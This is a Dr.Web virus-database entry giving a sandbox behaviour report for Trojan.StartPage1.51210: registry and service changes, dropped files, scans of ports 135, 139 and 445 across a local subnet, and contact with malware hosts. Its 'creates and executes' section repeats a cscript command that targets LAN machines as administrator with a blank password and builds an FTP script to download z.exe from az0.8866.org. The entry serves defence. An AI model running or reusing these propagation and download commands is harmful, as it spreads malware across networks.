La mia libreria
La mia libreria

+ Aggiungi alla libreria

Supporto
Supporto 24/7 | Regole per contattare

Richieste

Profile

Trojan.StartPage1.51210

Aggiunto al database dei virus Dr.Web: 2018-06-18

La descrizione è stata aggiunta:

Technical Information

To ensure autorun and distribution:
Modifies the following registry keys:
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'Explorer.exe'
Creates or modifies the following files:
  • %WINDIR%\Tasks\DSHo.vbe
  • %WINDIR%\Tasks\DSH4.exe
Creates the following services:
  • [<HKLM>\SYSTEM\ControlSet001\Services\Browser] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\lanmanworkstation] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\LmHosts] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\RpcLocator] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\NtLmSsp] 'Start' = '00000002'
Malicious functions:
Executes the following:
  • '<SYSTEM32>\taskkill.exe' /im coiome.exe /f
  • '<SYSTEM32>\taskkill.exe' /im iejore.exe /f
  • '<SYSTEM32>\taskkill.exe' /im conime.exe /f
Injects code into
the following system processes:
  • %WINDIR%\XXInstall\ps.exe
Terminates or attempts to terminate
the following system processes:
  • <SYSTEM32>\cscript.exe
  • <SYSTEM32>\cmd.exe
Modifies file system:
Creates the following files:
  • %ProgramFiles%\KHO.hta
  • %CommonProgramFiles%\sfbsbvy\coiome.exe
  • %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\b[1].jpg
  • %WINDIR%\Fonts\on.ini
  • %HOMEPATH%\Desktop\2345НшЦ·µјєЅ.url
  • \Device\LanmanRedirector\10.0.0.3\pipe\browser
  • \Device\LanmanRedirector\10.0.0.1\pipe\browser
  • \Device\LanmanRedirector\10.0.0.2\pipe\browser
  • \Device\LanmanRedirector\10.0.0.5\pipe\browser
  • \Device\LanmanRedirector\10.0.0.4\pipe\browser
  • \Device\LanmanRedirector\10.0.0.6\pipe\browser
  • \Device\LanmanRedirector\10.0.0.7\pipe\browser
  • \Device\LanmanRedirector\10.0.0.8\pipe\browser
  • \Device\LanmanRedirector\10.0.0.9\pipe\browser
  • \Device\LanmanRedirector\10.0.0.10\pipe\browser
Deletes the following files:
  • %ProgramFiles%\KHO.hta
  • <Full path to file>
Network activity:
Connects to:
  • 'localhost':1039
  • '<LOCALNET>.0.113':445
  • '<LOCALNET>.0.116':135
  • '<LOCALNET>.0.115':135
  • '<LOCALNET>.0.114':135
  • '<LOCALNET>.0.113':135
  • '<LOCALNET>.0.112':135
  • '<LOCALNET>.0.116':445
  • '<LOCALNET>.0.115':445
  • '<LOCALNET>.0.114':445
  • '<LOCALNET>.0.111':135
  • '<LOCALNET>.0.112':445
  • '<LOCALNET>.0.118':445
  • '<LOCALNET>.0.111':445
  • '<LOCALNET>.0.110':135
  • '<LOCALNET>.0.109':135
  • '<LOCALNET>.0.108':135
  • '<LOCALNET>.0.107':135
  • '<LOCALNET>.0.106':135
  • '<LOCALNET>.0.110':445
  • '<LOCALNET>.0.99':135
  • '<LOCALNET>.0.119':445
  • '<LOCALNET>.0.128':135
  • '<LOCALNET>.0.124':445
  • '<LOCALNET>.0.125':445
  • '<LOCALNET>.0.127':135
  • '<LOCALNET>.0.126':135
  • '<LOCALNET>.0.125':135
  • '<LOCALNET>.0.124':135
  • '<LOCALNET>.0.128':445
  • '<LOCALNET>.0.127':445
  • '<LOCALNET>.0.126':445
  • '<LOCALNET>.0.123':135
  • '<LOCALNET>.0.109':445
  • '<LOCALNET>.0.108':445
  • '<LOCALNET>.0.117':135
  • '<LOCALNET>.0.122':135
  • '<LOCALNET>.0.121':135
  • '<LOCALNET>.0.120':135
  • '<LOCALNET>.0.119':135
  • '<LOCALNET>.0.118':135
  • '<LOCALNET>.0.122':445
  • '<LOCALNET>.0.121':445
  • '<LOCALNET>.0.120':445
  • '<LOCALNET>.0.123':445
  • '<LOCALNET>.0.117':445
  • '<LOCALNET>.0.105':135
  • '<LOCALNET>.0.107':445
  • '<LOCALNET>.0.129':445
  • '<LOCALNET>.0.90':445
  • '<LOCALNET>.0.93':445
  • '<LOCALNET>.0.91':135
  • '<LOCALNET>.0.92':139
  • '<LOCALNET>.0.92':135
  • '<LOCALNET>.0.90':135
  • '<LOCALNET>.0.88':135
  • '<LOCALNET>.0.89':135
  • '<LOCALNET>.0.93':135
  • '<LOCALNET>.0.91':445
  • '<LOCALNET>.0.92':445
  • '<LOCALNET>.0.87':135
  • '<LOCALNET>.0.88':445
  • '<LOCALNET>.0.89':445
  • '<LOCALNET>.0.87':445
  • '<LOCALNET>.0.86':135
  • '<LOCALNET>.0.84':135
  • '<LOCALNET>.0.85':135
  • '<LOCALNET>.0.81':139
  • '<LOCALNET>.0.95':445
  • '<LOCALNET>.0.83':135
  • '<LOCALNET>.0.97':445
  • '<LOCALNET>.0.94':135
  • '<LOCALNET>.0.106':445
  • '<LOCALNET>.0.96':445
  • '<LOCALNET>.0.105':445
  • '<LOCALNET>.0.104':135
  • '<LOCALNET>.0.101':139
  • '<LOCALNET>.0.103':135
  • '<LOCALNET>.0.102':135
  • '<LOCALNET>.0.101':135
  • '<LOCALNET>.0.100':135
  • '<LOCALNET>.0.98':445
  • '<LOCALNET>.0.104':445
  • '<LOCALNET>.0.102':445
  • '<LOCALNET>.0.94':445
  • '<LOCALNET>.0.101':445
  • '<LOCALNET>.0.100':445
  • '<LOCALNET>.0.99':445
  • '<LOCALNET>.0.98':135
  • '<LOCALNET>.0.97':135
  • '<LOCALNET>.0.96':135
  • '<LOCALNET>.0.95':135
  • '<LOCALNET>.0.103':445
  • '<LOCALNET>.0.82':135
  • '<LOCALNET>.0.130':445
  • '<LOCALNET>.0.136':445
  • '<LOCALNET>.0.163':135
  • '<LOCALNET>.0.162':135
  • '<LOCALNET>.0.161':135
  • '<LOCALNET>.0.160':135
  • '<LOCALNET>.0.164':445
  • '<LOCALNET>.0.163':445
  • '<LOCALNET>.0.159':135
  • '<LOCALNET>.0.162':445
  • '<LOCALNET>.0.161':445
  • '<LOCALNET>.0.159':445
  • '<LOCALNET>.0.165':445
  • '<LOCALNET>.0.158':135
  • '<LOCALNET>.0.157':135
  • '<LOCALNET>.0.155':135
  • '<LOCALNET>.0.156':135
  • '<LOCALNET>.0.154':135
  • '<LOCALNET>.0.158':445
  • '<LOCALNET>.0.157':445
  • '<LOCALNET>.0.153':135
  • '<LOCALNET>.0.160':445
  • '<LOCALNET>.0.154':445
  • '<LOCALNET>.0.167':445
  • '<LOCALNET>.0.175':135
  • '<LOCALNET>.0.174':135
  • '<LOCALNET>.0.173':135
  • '<LOCALNET>.0.172':135
  • '<LOCALNET>.0.176':445
  • '<LOCALNET>.0.175':445
  • '<LOCALNET>.0.171':135
  • '<LOCALNET>.0.174':445
  • '<LOCALNET>.0.173':445
  • '<LOCALNET>.0.155':445
  • '<LOCALNET>.0.164':135
  • '<LOCALNET>.0.170':135
  • '<LOCALNET>.0.169':135
  • '<LOCALNET>.0.168':135
  • '<LOCALNET>.0.166':135
  • '<LOCALNET>.0.167':135
  • '<LOCALNET>.0.170':445
  • '<LOCALNET>.0.169':445
  • '<LOCALNET>.0.165':135
  • '<LOCALNET>.0.168':445
  • '<LOCALNET>.0.171':445
  • '<LOCALNET>.0.166':445
  • '<LOCALNET>.0.156':445
  • '<LOCALNET>.0.153':445
  • '<LOCALNET>.0.56':135
  • '<LOCALNET>.0.137':445
  • '<LOCALNET>.0.139':135
  • '<LOCALNET>.0.138':135
  • '<LOCALNET>.0.137':135
  • '<LOCALNET>.0.136':135
  • '<LOCALNET>.0.140':445
  • '<LOCALNET>.0.139':445
  • '<LOCALNET>.0.138':445
  • '<LOCALNET>.0.135':135
  • '<LOCALNET>.0.140':135
  • '<LOCALNET>.0.141':445
  • '<LOCALNET>.0.131':445
  • '<LOCALNET>.0.134':135
  • '<LOCALNET>.0.133':135
  • '<LOCALNET>.0.132':135
  • '<LOCALNET>.0.131':135
  • '<LOCALNET>.0.130':135
  • '<LOCALNET>.0.134':445
  • '<LOCALNET>.0.133':445
  • '<LOCALNET>.0.132':445
  • '<LOCALNET>.0.135':445
  • '<LOCALNET>.0.129':135
  • '<LOCALNET>.0.142':445
  • '<LOCALNET>.0.148':445
  • '<LOCALNET>.0.150':445
  • '<LOCALNET>.0.151':135
  • '<LOCALNET>.0.149':135
  • '<LOCALNET>.0.150':135
  • '<LOCALNET>.0.148':135
  • '<LOCALNET>.0.152':445
  • '<LOCALNET>.0.151':445
  • '<LOCALNET>.0.147':135
  • '<LOCALNET>.0.149':445
  • '<LOCALNET>.0.152':135
  • '<LOCALNET>.0.143':445
  • '<LOCALNET>.0.141':135
  • '<LOCALNET>.0.146':135
  • '<LOCALNET>.0.145':135
  • '<LOCALNET>.0.144':135
  • '<LOCALNET>.0.143':135
  • '<LOCALNET>.0.142':135
  • '<LOCALNET>.0.146':445
  • '<LOCALNET>.0.145':445
  • '<LOCALNET>.0.144':445
  • '<LOCALNET>.0.147':445
  • '<LOCALNET>.0.86':445
  • '<LOCALNET>.0.84':445
  • '<LOCALNET>.0.85':445
  • '<LOCALNET>.0.32':445
  • '<LOCALNET>.0.31':445
  • '<LOCALNET>.0.30':445
  • '<LOCALNET>.0.27':135
  • '<LOCALNET>.0.29':445
  • '<LOCALNET>.0.28':445
  • '<LOCALNET>.0.26':139
  • '<LOCALNET>.0.24':139
  • '<LOCALNET>.0.23':139
  • '<LOCALNET>.0.26':135
  • '<LOCALNET>.0.31':135
  • '<LOCALNET>.0.25':135
  • '<LOCALNET>.0.24':135
  • '<LOCALNET>.0.22':139
  • '<LOCALNET>.0.21':139
  • '<LOCALNET>.0.23':135
  • '<LOCALNET>.0.22':135
  • '<LOCALNET>.0.26':445
  • '<LOCALNET>.0.29':135
  • '<LOCALNET>.0.27':445
  • '<LOCALNET>.0.39':135
  • '<LOCALNET>.0.32':135
  • '<LOCALNET>.0.39':445
  • '<LOCALNET>.0.38':135
  • '<LOCALNET>.0.37':135
  • '<LOCALNET>.0.36':135
  • '<LOCALNET>.0.35':139
  • '<LOCALNET>.0.35':135
  • '<LOCALNET>.0.34':135
  • '<LOCALNET>.0.38':445
  • '<LOCALNET>.0.25':445
  • '<LOCALNET>.0.37':445
  • '<LOCALNET>.0.30':135
  • '<LOCALNET>.0.35':445
  • '<LOCALNET>.0.34':445
  • '<LOCALNET>.0.33':445
  • '<LOCALNET>.0.28':139
  • '<LOCALNET>.0.32':139
  • '<LOCALNET>.0.30':139
  • '<LOCALNET>.0.31':139
  • '<LOCALNET>.0.29':139
  • '<LOCALNET>.0.36':445
  • '<LOCALNET>.0.24':445
  • '<LOCALNET>.0.40':445
  • '<LOCALNET>.0.21':135
  • '<LOCALNET>.0.23':445
  • '<LOCALNET>.0.10':445
  • '<LOCALNET>.0.41':445
  • '<LOCALNET>.0.8':135
  • '<LOCALNET>.0.7':135
  • '<LOCALNET>.0.6':135
  • '<LOCALNET>.0.8':445
  • '<LOCALNET>.0.7':445
  • '<LOCALNET>.0.6':445
  • '<LOCALNET>.0.5':135
  • '<LOCALNET>.0.9':135
  • '<LOCALNET>.0.11':445
  • '<LOCALNET>.0.4':135
  • '<LOCALNET>.0.3':135
  • '<LOCALNET>.0.3':445
  • '<LOCALNET>.0.2':135
  • '<LOCALNET>.0.2':445
  • '<LOCALNET_GATEWAY>':135
  • '<LOCALNET_GATEWAY>':445
  • 'tj.##16800.com':80
  • 'q.###6800.com':80
  • '<LOCALNET>.0.5':445
  • '<LOCALNET>.0.4':445
  • '<LOCALNET>.0.33':135
  • '<LOCALNET>.0.13':445
  • '<LOCALNET>.0.17':445
  • '<LOCALNET>.0.18':445
  • '<LOCALNET>.0.21':445
  • '<LOCALNET>.0.20':135
  • '<LOCALNET>.0.19':135
  • '<LOCALNET>.0.18':135
  • '<LOCALNET>.0.17':135
  • '<LOCALNET>.0.16':135
  • '<LOCALNET>.0.20':445
  • '<LOCALNET>.0.19':445
  • '<LOCALNET>.0.22':445
  • '<LOCALNET>.0.12':445
  • '<LOCALNET>.0.9':445
  • '<LOCALNET>.0.16':445
  • '<LOCALNET>.0.15':445
  • '<LOCALNET>.0.14':135
  • '<LOCALNET>.0.13':135
  • '<LOCALNET>.0.12':135
  • '<LOCALNET>.0.11':135
  • '<LOCALNET>.0.10':135
  • '<LOCALNET>.0.14':445
  • '<LOCALNET>.0.15':135
  • '<LOCALNET>.0.28':135
  • '<LOCALNET>.0.42':445
  • '<LOCALNET>.0.74':445
  • '<LOCALNET>.0.66':139
  • '<LOCALNET>.0.73':445
  • '<LOCALNET>.0.72':445
  • '<LOCALNET>.0.69':135
  • '<LOCALNET>.0.71':445
  • '<LOCALNET>.0.70':445
  • '<LOCALNET>.0.69':445
  • '<LOCALNET>.0.68':135
  • '<LOCALNET>.0.67':135
  • '<LOCALNET>.0.43':445
  • '<LOCALNET>.0.70':135
  • '<LOCALNET>.0.63':445
  • '<LOCALNET>.0.65':135
  • '<LOCALNET>.0.64':135
  • '<LOCALNET>.0.68':445
  • '<LOCALNET>.0.67':445
  • '<LOCALNET>.0.66':445
  • '<LOCALNET>.0.63':135
  • '<LOCALNET>.0.65':445
  • '<LOCALNET>.0.64':445
  • '<LOCALNET>.0.64':139
  • '<LOCALNET>.0.66':135
  • '<LOCALNET>.0.71':135
  • '<LOCALNET>.0.80':445
  • '<LOCALNET>.0.76':135
  • '<LOCALNET>.0.82':445
  • '<LOCALNET>.0.83':445
  • '<LOCALNET>.0.81':445
  • '<LOCALNET>.0.80':139
  • '<LOCALNET>.0.80':135
  • '<LOCALNET>.0.79':135
  • '<LOCALNET>.0.78':135
  • '<LOCALNET>.0.77':135
  • '<LOCALNET>.0.81':135
  • '<LOCALNET>.0.72':135
  • '<LOCALNET>.0.73':135
  • '<LOCALNET>.0.79':445
  • '<LOCALNET>.0.75':135
  • '<LOCALNET>.0.77':445
  • '<LOCALNET>.0.76':445
  • '<LOCALNET>.0.75':445
  • '<LOCALNET>.0.74':139
  • '<LOCALNET>.0.73':139
  • '<LOCALNET>.0.74':135
  • '<LOCALNET>.0.78':445
  • '<LOCALNET>.0.172':445
  • '<LOCALNET>.0.176':135
  • '<LOCALNET>.0.61':135
  • '<LOCALNET>.0.46':445
  • '<LOCALNET>.0.49':135
  • '<LOCALNET>.0.48':135
  • '<LOCALNET>.0.47':135
  • '<LOCALNET>.0.46':135
  • '<LOCALNET>.0.50':445
  • '<LOCALNET>.0.49':445
  • '<LOCALNET>.0.48':445
  • '<LOCALNET>.0.45':135
  • '<LOCALNET>.0.62':135
  • '<LOCALNET>.0.48':139
  • '<LOCALNET>.0.45':445
  • '<LOCALNET>.0.44':135
  • '<LOCALNET>.0.43':135
  • '<LOCALNET>.0.42':135
  • '<LOCALNET>.0.41':135
  • '<LOCALNET>.0.40':139
  • '<LOCALNET>.0.40':135
  • '<LOCALNET>.0.39':139
  • '<LOCALNET>.0.44':445
  • '<LOCALNET>.0.47':445
  • '<LOCALNET>.0.61':139
  • '<LOCALNET>.0.50':139
  • '<LOCALNET>.0.53':445
  • '<LOCALNET>.0.51':445
  • '<LOCALNET>.0.60':135
  • '<LOCALNET>.0.59':135
  • '<LOCALNET>.0.58':135
  • '<LOCALNET>.0.62':445
  • '<LOCALNET>.0.61':445
  • '<LOCALNET>.0.60':445
  • '<LOCALNET>.0.57':135
  • '<LOCALNET>.0.59':445
  • '<LOCALNET>.0.52':445
  • '<LOCALNET>.0.58':445
  • '<LOCALNET>.0.50':135
  • '<LOCALNET>.0.55':135
  • '<LOCALNET>.0.54':135
  • '<LOCALNET>.0.53':135
  • '<LOCALNET>.0.52':135
  • '<LOCALNET>.0.56':445
  • '<LOCALNET>.0.55':445
  • '<LOCALNET>.0.54':445
  • '<LOCALNET>.0.51':135
  • '<LOCALNET>.0.57':445
  • '<LOCALNET>.0.177':445
TCP:
HTTP GET requests:
  • http://q.###6800.com/b.jpg
  • http://tj.##16800.com/t/Count.asp?ma################################
UDP:
  • DNS ASK q.###6800.com
  • DNS ASK tj.##16800.com
  • DNS ASK 3.#.#.#0.in-addr.arpa
Miscellaneous:
Searches for the following windows:
  • ClassName: '' WindowName: ''
Creates and executes the following:
  • '%CommonProgramFiles%\sfbsbvy\coiome.exe'
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.89 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.84 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.88 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.90 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.92 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.86 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.87 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.91 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.89 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.90 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.88 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.93 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.92 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.94 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.95 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.107 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.96 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.97 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.98 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.93 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.94 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.95 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.99 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.100 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.101 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.102 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.103 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.104 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.105 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.106 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.87 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.91 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.82 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.78 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.70 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.71 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.72 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.73 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.74 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.69 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.70 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.72 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.71 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.75 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.74 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.73 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.76 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.77 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.79 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.83 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.80 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.75 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.77 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.76 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.81 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.80 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.83 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.79 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.78 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.82 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.85 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.84 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.86 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.81 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.85 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.126 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.175 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.110 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.145 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.146 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.147 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.148 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.150 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.149 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.151 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.152 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.153 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.154 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.156 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.155 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.157 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.158 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.160 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.109 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.161 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.162 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.163 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.164 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.165 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.167 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.166 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.168 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.169 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.170 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.171 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.172 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.173 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.174 :
  • '%WINDIR%\Tasks\DSH4.exe' 10.0.0.144 :
